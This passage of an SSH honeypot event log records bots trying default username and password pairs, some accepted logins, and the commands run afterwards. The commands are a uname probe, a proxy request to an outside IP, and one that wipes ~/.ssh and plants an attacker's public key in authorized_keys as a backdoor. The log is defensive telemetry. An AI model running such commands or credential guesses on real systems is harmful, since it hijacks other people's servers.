6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T19:46:55.622648Z","src_ip":"212.227.125.160","session":"cedd8aefcbef"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:46:55.963775Z","src_ip":"212.227.125.160","session":"cedd8aefcbef"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T19:46:56.127443Z","session":"cedd8aefcbef"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":42188,"dst_ip":"1.2.3.4","dst_port":22,"session":"034c8ae4ad70","protocol":"ssh","message":"New connection: 217.154.1.158:42188 (1.2.3.4:22) [session: 034c8ae4ad70]","sensor":"my-vps","timestamp":"2025-08-26T19:47:08.285898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:47:08.286969Z","src_ip":"217.154.1.158","session":"034c8ae4ad70"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:47:08.301176Z","src_ip":"217.154.1.158","session":"034c8ae4ad70"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic","message":"login attempt [elastic/elastic] failed","sensor":"my-vps","timestamp":"2025-08-26T19:47:08.344838Z","src_ip":"217.154.1.158","session":"034c8ae4ad70"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:47:09.361950Z","src_ip":"217.154.1.158","session":"034c8ae4ad70"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":38454,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ea10206a3b5","protocol":"ssh","message":"New connection: 217.154.1.158:38454 (1.2.3.4:22) [session: 0ea10206a3b5]","sensor":"my-vps","timestamp":"2025-08-26T19:47:25.880837Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:47:25.881628Z","src_ip":"217.154.1.158","session":"0ea10206a3b5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:47:25.896052Z","src_ip":"217.154.1.158","session":"0ea10206a3b5"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-26T19:47:25.939428Z","src_ip":"217.154.1.158","session":"0ea10206a3b5"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:47:26.956668Z","src_ip":"217.154.1.158","session":"0ea10206a3b5"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":33562,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd81f046b538","protocol":"ssh","message":"New connection: 199.195.248.191:33562 (1.2.3.4:22) [session: fd81f046b538]","sensor":"my-vps","timestamp":"2025-08-26T19:47:29.035094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:47:29.044707Z","src_ip":"199.195.248.191","session":"fd81f046b538"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:47:29.131248Z","src_ip":"199.195.248.191","session":"fd81f046b538"}
{"eventid":"cowrie.login.failed","username":"deployer","password":"deployer123","message":"login attempt [deployer/deployer123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:47:29.499637Z","src_ip":"199.195.248.191","session":"fd81f046b538"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:47:30.598303Z","src_ip":"199.195.248.191","session":"fd81f046b538"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":56114,"dst_ip":"1.2.3.4","dst_port":22,"session":"fed34949dbbc","protocol":"ssh","message":"New connection: 217.154.1.158:56114 (1.2.3.4:22) [session: fed34949dbbc]","sensor":"my-vps","timestamp":"2025-08-26T19:47:43.391565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:47:43.392674Z","src_ip":"217.154.1.158","session":"fed34949dbbc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:47:43.406291Z","src_ip":"217.154.1.158","session":"fed34949dbbc"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres123","message":"login attempt [postgres/postgres123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:47:43.449456Z","src_ip":"217.154.1.158","session":"fed34949dbbc"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:47:44.472419Z","src_ip":"217.154.1.158","session":"fed34949dbbc"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":49996,"dst_ip":"1.2.3.4","dst_port":22,"session":"8427ad17289d","protocol":"ssh","message":"New connection: 217.154.1.158:49996 (1.2.3.4:22) [session: 8427ad17289d]","sensor":"my-vps","timestamp":"2025-08-26T19:48:00.791903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:48:00.792802Z","src_ip":"217.154.1.158","session":"8427ad17289d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:48:00.807036Z","src_ip":"217.154.1.158","session":"8427ad17289d"}
{"eventid":"cowrie.login.failed","username":"ts","password":"ts","message":"login attempt [ts/ts] failed","sensor":"my-vps","timestamp":"2025-08-26T19:48:00.855066Z","src_ip":"217.154.1.158","session":"8427ad17289d"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:48:01.872270Z","src_ip":"217.154.1.158","session":"8427ad17289d"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:48:05.509196Z","src_ip":"212.227.125.160","session":"cedd8aefcbef"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":36910,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac818203c9aa","protocol":"ssh","message":"New connection: 217.154.1.158:36910 (1.2.3.4:22) [session: ac818203c9aa]","sensor":"my-vps","timestamp":"2025-08-26T19:48:18.304415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:48:18.305334Z","src_ip":"217.154.1.158","session":"ac818203c9aa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:48:18.319574Z","src_ip":"217.154.1.158","session":"ac818203c9aa"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty","message":"login attempt [root/Qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:48:18.364334Z","src_ip":"217.154.1.158","session":"ac818203c9aa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:48:18.411655Z","src_ip":"217.154.1.158","session":"ac818203c9aa"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:48:18.412332Z","src_ip":"217.154.1.158","session":"ac818203c9aa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:48:18.427551Z","src_ip":"217.154.1.158","session":"ac818203c9aa"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:48:18.428473Z","src_ip":"217.154.1.158","session":"ac818203c9aa"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":60374,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d81e637c00d","protocol":"ssh","message":"New connection: 199.195.248.191:60374 (1.2.3.4:22) [session: 0d81e637c00d]","sensor":"my-vps","timestamp":"2025-08-26T19:48:32.268272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:48:32.275085Z","src_ip":"199.195.248.191","session":"0d81e637c00d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:48:32.360651Z","src_ip":"199.195.248.191","session":"0d81e637c00d"}
{"eventid":"cowrie.login.success","username":"root","password":"ADmin123","message":"login attempt [root/ADmin123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:48:32.716621Z","src_ip":"199.195.248.191","session":"0d81e637c00d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:48:32.972530Z","src_ip":"199.195.248.191","session":"0d81e637c00d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:48:32.973666Z","src_ip":"199.195.248.191","session":"0d81e637c00d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:48:32.974915Z","src_ip":"199.195.248.191","session":"0d81e637c00d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:48:33.073510Z","src_ip":"199.195.248.191","session":"0d81e637c00d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:48:33.275873Z","src_ip":"199.195.248.191","session":"0d81e637c00d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:48:33.276565Z","src_ip":"199.195.248.191","session":"0d81e637c00d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:48:33.367793Z","src_ip":"199.195.248.191","session":"0d81e637c00d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:48:33.368697Z","src_ip":"199.195.248.191","session":"0d81e637c00d"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":60940,"dst_ip":"1.2.3.4","dst_port":22,"session":"4604c373b7ce","protocol":"ssh","message":"New connection: 199.195.248.191:60940 (1.2.3.4:22) [session: 4604c373b7ce]","sensor":"my-vps","timestamp":"2025-08-26T19:48:33.453295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:48:33.455554Z","src_ip":"199.195.248.191","session":"4604c373b7ce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:48:33.549259Z","src_ip":"199.195.248.191","session":"4604c373b7ce"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:48:33.912319Z","src_ip":"199.195.248.191","session":"4604c373b7ce"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:48:35.002418Z","src_ip":"199.195.248.191","session":"4604c373b7ce"}
